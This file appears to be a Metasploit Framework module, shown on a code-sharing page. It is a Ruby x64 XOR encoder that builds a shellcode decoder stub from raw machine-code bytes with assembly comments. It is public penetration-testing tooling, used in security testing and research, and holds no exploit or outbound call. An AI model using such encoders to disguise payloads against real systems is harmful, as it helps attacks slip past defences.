Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Encoder::Xor
7

8
  def initialize
9
    super(
10
      'Name'             => 'XOR Encoder',
11
      'Description'      => 'An x64 XOR encoder. Uses an 8 byte key and takes advantage of x64 relative addressing.',
12
      'Author'           => [ 'sf' ],
13
      'Arch'             => ARCH_X64,
14
      'License'          => MSF_LICENSE,
15
      'Decoder'          =>
16
        {
17
          'KeySize'      => 8,
18
          'KeyPack'      => 'Q',
19
          'BlockSize'    => 8,
20
        }
21
      )
22
  end
23
  # Indicate that this module can preserve some registers
24
  # ...which is currently not true. This is a temp fix
25
  # until the full preserve_registers functionality is
26
  # implemented.
27
  def can_preserve_registers?
28
    true
29
  end
30

31
  def decoder_stub( state )
32

33
    # calculate the (negative) block count . We should check this against state.badchars.
34
    block_count = [-( ( (state.buf.length - 1) / state.decoder_key_size) + 1)].pack( "V" )
35

36
    decoder =   "\x48\x31\xC9" +                 # xor rcx, rcx
37
          "\x48\x81\xE9" + block_count +   # sub ecx, block_count
38
          "\x48\x8D\x05\xEF\xFF\xFF\xFF" + # lea rax, [rel 0x0]
39
          "\x48\xBBXXXXXXXX" +             # mov rbx, 0x????????????????
40
          "\x48\x31\x58\x27" +             # xor [rax+0x27], rbx
41
          "\x48\x2D\xF8\xFF\xFF\xFF" +     # sub rax, -8
42
          "\xE2\xF4"                       # loop 0x1B
43

44
    state.decoder_key_offset = decoder.index( 'XXXXXXXX' )
45

46
    return decoder
47
  end
48
end
49

50